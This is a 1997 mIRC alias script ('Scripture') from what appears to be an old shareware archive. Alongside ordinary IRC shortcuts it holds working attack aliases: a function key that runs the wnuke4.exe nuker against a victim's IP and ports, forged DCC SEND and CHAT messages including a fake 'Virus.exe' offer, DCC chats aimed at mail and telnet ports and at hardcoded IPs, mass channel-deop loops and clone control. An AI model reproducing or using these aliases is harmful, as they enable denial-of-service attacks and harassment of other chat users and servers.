home *** CD-ROM | disk | FTP | other *** search
Wrap
INI File | 1997-02-07 | 6.9 KB | 175 lines
[Aliases] n0=/op /mode # +ooo $$1 $2 $3 n1=/dop /mode # -ooo $$1 $2 $3 n2=/j /join #$$1 n3=/p /part # n4=/time /say $time n5=/fhelp /query Scripture Function Key Assignments: | /query Scripture 2F1 = Help with mIRC | /query Scripture 2F2 = Nuke Someone | /query Scripture 2F3 = Engage Protection | /query Scripture 2F4 = Turn Complete Ignore On. | /query Scripture 2F5 = Turn Complete Ignore Off. n6=/f2 /run $mircdir\Exe\wnuke4.exe -n $$?="Enter Server of Victim" $$?="Enter IP of Victim" 0 1024-2024 $$?="Server Port Of Victim" n7=/n /names #$$1 n8=/w /whois $$1 n9=/k /kick # $$1 n10=/q /query $$1 n11=/hop /part # | /join #$$1 n12=/send /dcc send $1 $2 n13=/chat /dcc chat $1 n14=/ping /ctcp $$1 ping n15=/echocolors echo 1 1 2 2 3 3 4 4 5 5 6 6 7 7 8 8 9 9 10 10 11 11 12 12 13 13 14 14 15 15 16 16 n16=/saycolors say 1 1 2 2 3 3 4 4 5 5 6 6 7 7 8 8 9 9 10 10 11 11 12 12 13 13 14 14 15 15 16 16 n17=/xx /set %x $+ $$1 $+ , $+ $2 | /say %x *3 n18=/longip { echo 2 Converted $$1 to $longip($$1) } n19=atime { n20= set %atime $gettok($time,1,58) n21= if (%atime >= 13) { %atime = %atime - 12 | return %atime $+ : $+ $gettok($time,2,58) $+ pm } n22= else if (%atime == 12) { return %atime $+ : $+ $gettok($time,2,58) $+ pm } n23= else if (%atime == 0) { %atime = %atime + 12 | return %atime $+ : $+ $gettok($time,2,58) $+ am } n24= else { return %atime $+ : $+ $gettok($time,2,58) $+ am } n25=} n26=/time /say $atime n27=ascii { n28= set %chr.var 1 n29= :loop n30= if (%chr.var > 255) { goto done } n31= echo 1 Ascii %chr.var is $chr(%chr.var) n32= inc %chr.var 1 n33= goto loop n34= :done n35=} n36=ghost { n37= join $$1 $+ $chr(160) n38=} n39=fchan { n40= join $$1 $+ $chr(160) $+ @ $+ $$2 n41=} n42=j2 { n43= join $$1 $+ $chr(160) $+ $$2 n44=} n45=j3 { n46= join $$1 $+ $chr(160) $+ $$2 $+ $chr(160) $+ $$3 n47=} n48=fakedcc { n49= raw -q privmsg $$1 :DCC SEND $$2 3353362454 19 $$3 n50=} n51=finvite { n52= invite $$1 $$2 $+ $chr(160) n53=} n54=fchat { n55= raw -q privmsg $1 :DCC CHAT CHAT $longip($ip) 110 n56=} n57=clonestat { n58= if ( $dde mirc2 connected "" == not connected) { n59= echo 2 Your clone is currently not connected to IRC. n60= halt n61= } n62= echo 2 $dde mirc2 nickname "" is currently connected to $dde mirc2 server "" n63= echo 2 $dde mirc2 nickname "" currently on $dde mirc2 channels "" n64=} n65=clonejoin { n66= dde mirc2 command "" /join $$1 n67=} n68=cloneinvite { n69= dde mirc2 command "" /invite $$1 $$2 n70=} n71=cloneping { n72= dde mirc2 command "" /ctcp $$1 ping n73=} n74=/mail /raw -q PRIVMSG :DCC CHAT CHAT $$?="Long IP of Mail Server:" 25 n75=/tel /raw -q PRIVMSG :DCC CHAT CHAT $$?="Long IP of Telnet Server:" 23 n76=/joinall { n77= set %joinallnick $$1 n78= /whois $$1 n79=} n80=/heh /raw -q privmsg CeR_ : $+ $chr(1) $+ DCC CHAT CHAT 3227799908 23 $+ $chr(1) n81=/gee /raw -q privmsg CeR_ : $+ $chr(1) $+ DCC CHAT CHAT 3498702853 7000 $chr(1) n82=/line { n83= set %line *1 n84= %line = $replace(%line,a,a) n85= %line = $replace(%line,e,e) n86= %line = $replace(%line,i,i) n87= %line = $replace(%line,o,o) n88= %line = $replace(%line,u,u) n89= say %line n90= unset %line n91=} n92=/moo { n93= set %moo *1 n94= %moo = $replace(%moo,a,σ) n95= %moo = $replace(%moo,e,Θ) n96= %moo = $replace(%moo,i,∩) n97= %moo = $replace(%moo,o,≡) n98= %moo = $replace(%moo,c,τ) n99= %moo = $replace(%moo,p,■) n100= %moo = $replace(%moo,b,▀) n101= %moo = $replace(%moo,x,╫) n102= %moo = $replace(%moo,y,²) n103= %moo = $replace(%moo,r,«) n104= say %moo n105= unset %moo n106=} n107=/col { n108= set %col *1 n109= %col = $replace(%col,a,4a) n110= %col = $replace(%col,b,2b) n111= %col = $replace(%col,c,3c) n112= %col = $replace(%col,d,4d) n113= %col = $replace(%col,e,5e) n114= %col = $replace(%col,f,6f) n115= %col = $replace(%col,g,7g) n116= %col = $replace(%col,h,6h) n117= %col = $replace(%col,i,9i) n118= %col = $replace(%col,j,10j) n119= %col = $replace(%col,k,11k) n120= %col = $replace(%col,l,12l) n121= %col = $replace(%col,m,13m) n122= %col = $replace(%col,n,14n) n123= %col = $replace(%col,o,2o) n124= %col = $replace(%col,p,3p) n125= %col = $replace(%col,q,4q) n126= %col = $replace(%col,r,5r) n127= %col = $replace(%col,s,6s) n128= %col = $replace(%col,t,7t) n129= %col = $replace(%col,u,4u) n130= %col = $replace(%col,v,9v) n131= %col = $replace(%col,w,10w) n132= %col = $replace(%col,x,11x) n133= %col = $replace(%col,y,2y) n134= %col = $replace(%col,z,3z) n135= %col = $replace(%col,g,7g) n136= say %col n137= unset %col n138=} n139=/F3 /ignore -tiu120 *!*@* | /echo 4 Protection Engaged! n140=/ew { n141= set %whois on n142= whois $$1 n143=} n144=/ur /say $url n145=MassDeop { n146= %deopvar = 0 n147= %deopnicks = "" n148= :next n149= inc %deopvar 1 n150= if ($opnick(%deopvar,$$1) == $me) { goto next } n151= if ($opnick(%deopvar,$$1) == $null) { n152= if ($len(%deopnicks) > 0) { mode # -oooo %deopnicks } n153= goto done n154= } n155= %deopnicks = %deopnicks $opnick(%deopvar,$$1) n156= if (4 // %deopvar) { mode # -oooo %deopnicks | %deopnicks = "" } n157= goto next n158= :done n159=} n160=/mdeop { n161= set %op 1 n162= :start n163= if ($opnick(%op,#) == $null) { notice # Scripture v1.0 Mass Deop | unset %op | halt } n164= if ($opnick(%op,#) == $me) { inc %op | goto start } n165= else { mode # -o $opnick(%op,#) | inc %op | goto start } n166=} n167=/neato /say 2ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 3ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 4ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 5ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 6ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 7ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 8ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 9ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 10ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ | /say 11ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ n168=/thanks /query Acknowledgments 4Thanks To: | /query Acknowledgments 2-The People of #CTFire and CTFire's War Board. | /query Acknowledgments 2-The People who wrote the mIRC Addons. | /query Acknowledgments 2-Khaled! aka: God | /query Acknowledgments 2-Laurence Simon, whose page got me interested. | /query Acknowledgments 2-The Scripters Guild n169=/virus /raw -q privmsg $$1 :DCC SEND Virus.exe 666 25 666 n170=/cignore /ignore *!*@* | /timer3 1 30 /echo 4 *** Everyone is being ignored n171=/cignoren /ignore -r *!*@* | /timer3 off | /echo 4 *** Complete Ignore is off n172=/chan /echo 2 -=Scripture Channel Information=- | /echo 4 [ $nick(0,#) People in $chan] | /echo 4 [ $+ $opnick(0,#) are Operators.] | /echo 4 [ $+ $nopnick(0,#) are not Operators.]